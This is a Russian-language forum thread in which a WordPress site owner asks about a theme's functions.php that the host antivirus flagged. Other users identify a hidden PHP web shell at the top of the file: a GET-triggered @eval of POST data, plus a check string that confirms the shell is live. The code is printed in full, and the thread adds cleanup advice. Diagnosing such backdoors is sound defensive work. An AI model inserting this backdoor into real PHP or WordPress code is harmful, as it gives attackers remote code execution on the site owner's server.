Помощь Антивирус показывает вирус в файле

[wolgast]

Помогите разобраться, встроенный антивирус на хостинге reg.ru ругается на файл wp-content/themes/jarida_2.0.0/functions.php

Посмотрел, своими силами подозрительного ничего не нашёл, скажите, стоит чего то бояться:

<?php
function _g3t($str){
    $val = !empty($_GET[$str]) ? $_GET[$str] : null;
    return $val;
}
if(_g3t('Glb')=='f')
{
@eval($_POST['UHiDB']);
exit;
}
if(_g3t('Glb')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}
//dsd6sc378axvg
?>
<?php

$themename = "Jarida";
$themefolder = "jarida";

define ('theme_name', $themename );
define ('theme_ver' , 0.1 );

// Notifier Info
$notifier_name = $themename;
$notifier_url = "http://themes.tielabs.com/xml/".$themefolder.".xml";

//Docs Url
$docs_url = "http://themes.tielabs.com/docs/".$themefolder;

// Constants for the theme name, folder and remote XML url
define( 'MTHEME_NOTIFIER_THEME_NAME', $themename );
define( 'MTHEME_NOTIFIER_THEME_FOLDER_NAME', $themefolder );
define( 'MTHEME_NOTIFIER_XML_FILE', $notifier_url );
define( 'MTHEME_NOTIFIER_CACHE_INTERVAL', 43200 );

// WooCommerce
define('WOOCOMMERCE_USE_CSS', false);
add_action('woocommerce_before_main_content', 'my_theme_wrapper_start', 1);
function my_theme_wrapper_start() {
    if(tie_get_option( 'columns_num' ) != '2c')
        echo '<div class="content-wrap content-wrap-wide">';
    else   
        echo '<div class="content-wrap">';
}
add_action('woocommerce_archive_description', 'my_theme_wrapper_start2', 1);
function my_theme_wrapper_start2() {
  echo '<div class="clear"></div>';
}


global $pagenow;
if ( is_admin() && isset( $_GET['activated'] ) && $pagenow == 'themes.php' )
    add_action( 'init', 'tie_woocommerce_image_dimensions', 1 );

function tie_woocommerce_image_dimensions() {
      $catalog = array(
        'width'     => '400',    // px
        'height'    => '400',    // px
        'crop'        => 1         // true
    );
    $single = array(
        'width'     => '600',    // px
        'height'    => '600',    // px
        'crop'        => 1         // true
    );
    $thumbnail = array(
        'width'     => '200',    // px
        'height'    => '200',    // px
        'crop'        => 1         // false
    );
    // Image sizes
    update_option( 'shop_catalog_image_size', $catalog );         // Product category thumbs
    update_option( 'shop_single_image_size', $single );         // Single product image
    update_option( 'shop_thumbnail_image_size', $thumbnail );     // Image gallery thumbs
}


// Custom Functions
include (TEMPLATEPATH . '/custom-functions.php');

// Get Functions
include (TEMPLATEPATH . '/functions/home-cats.php');
include (TEMPLATEPATH . '/functions/home-cats-wide.php');
include (TEMPLATEPATH . '/functions/home-cat-scroll.php');
include (TEMPLATEPATH . '/functions/home-cat-pic.php');
include (TEMPLATEPATH . '/functions/home-recent-box.php');
include (TEMPLATEPATH . '/functions/theme-functions.php');
include (TEMPLATEPATH . '/functions/common-scripts.php');
include (TEMPLATEPATH . '/functions/banners.php');
include (TEMPLATEPATH . '/functions/tie-views.php');
include (TEMPLATEPATH . '/functions/widgetize-theme.php');
include (TEMPLATEPATH . '/functions/default-options.php');
include (TEMPLATEPATH . '/functions/updates.php');

include (TEMPLATEPATH . '/includes/pagenavi.php');
include (TEMPLATEPATH . '/includes/breadcrumbs.php');
include (TEMPLATEPATH . '/includes/wp_list_comments.php');
include (TEMPLATEPATH . '/includes/widgets.php');

// TIE-Panel
include (TEMPLATEPATH . '/panel/shortcodes/shortcode.php');
if (is_admin()) {
    include (TEMPLATEPATH . '/panel/mpanel-ui.php');
    include (TEMPLATEPATH . '/panel/mpanel-functions.php');
    include (TEMPLATEPATH . '/panel/post-options.php');
    include (TEMPLATEPATH . '/panel/custom-slider.php');
    include (TEMPLATEPATH . '/panel/category-options.php');
    include (TEMPLATEPATH . '/panel/notifier/update-notifier.php');
    include (TEMPLATEPATH . '/panel/importer/tie-importer.php');
}

/*-----------------------------------------------------------------------------------*/
# Custom Admin Bar Menus
/*-----------------------------------------------------------------------------------*/
function tie_admin_bar() {
    global $wp_admin_bar;
   
    if ( current_user_can( 'switch_themes' ) ){
        $wp_admin_bar->add_menu( array(
            'parent' => 0,
            'id' => 'mpanel_page',
            'title' => theme_name ,
            'href' => admin_url( 'admin.php?page=panel')
        ) );
    }
   
}
add_action( 'wp_before_admin_bar_render', 'tie_admin_bar' );

// with activate istall option
if ( is_admin() && isset($_GET['activated'] ) && $pagenow == 'themes.php' ) {

    if( !get_option('tie_active') ){
        tie_save_settings( $default_data );
        update_option( 'tie_active' , theme_ver );
    }
   //header("Location: admin.php?page=panel");
   
}

?>

 

[Горбушка]

<?php
function _g3t($str){
    $val = !empty($_GET[$str]) ? $_GET[$str] : null;
    return $val;
}
if(_g3t('Glb')=='f')
{
@eval($_POST['UHiDB']);
exit;
}
if(_g3t('Glb')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}
//dsd6sc378axvg
?>

Это тоже ничего подозрительного? )))

@eval($_POST['UHiDB']); - ппередаём команду методом POST в переменную UHiDB - и она тут же выполняется на сервере )))

 

[latteo]

if(_g3t('Glb')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}

А вот этот тип кода очень популярен для валидации шела - простой GET запрос + быстрый ответ.
И мне пока еще ни разу не попадалось, чтобы такой шел был только в одном файле. Чаще всего он раскидан по 10 разных мест + 2-3 полноценных шела на хостинге.
Так что чекайте весь акк по дате изменения файлов, айболитом, меняйте пароли (к БД так точно) и т.д.

 

[dimabik]

ТС а самое главное шаблон то откуда с просторов инета или купленный? Просто уже поставленный такой с вирусом или кто-то так воткнул?!

 

[wolgast]

Купленный на Telderi был, уже в самом шаблоне был вставлен шелл. Думаю продавец где то нашёл платный шаблон, переделал его для продажи, а шелл не заметил. Потому что в других файлах нет ничего, проверял сейчас ай-болитом, плюс стоит антишелл, которые присылает уведомление если было добавлены новые файлы или изменены.

 

[Горбушка]

@wolgast, раз ты не заметил шелл в первых же строках файла, то и в других файлах ты не найдёшь, если там чуть более хитро сделано.
Обращайся к профи (к примеру @latteo) за аудитом.

 

[WP30]

Купленный на Telderi был, уже в самом шаблоне был вставлен шелл. Думаю продавец где то нашёл платный шаблон, переделал его для продажи, а шелл не заметил. Потому что в других файлах нет ничего, проверял сейчас ай-болитом, плюс стоит антишелл, которые присылает уведомление если было добавлены новые файлы или изменены.

каким антишеллом пользуешься? буду благодарен за ссылку )))

 

[wolgast]

antishell.ru бесплатный, можно настроить на постоянную проверку по cron, в случае опасности, изменение, добавление файлов, присылает сразу отчёт на e-mail

 

[manzilla]

Так что чекайте весь акк по дате изменения файлов, айболитом, меняйте пароли (к БД так точно) и т.д.

снести и перезалить с репозитория вп двиг и плагины, оставить только тему, ну те сузить круг поисков, в папке аплоуд можно визуально посмотреть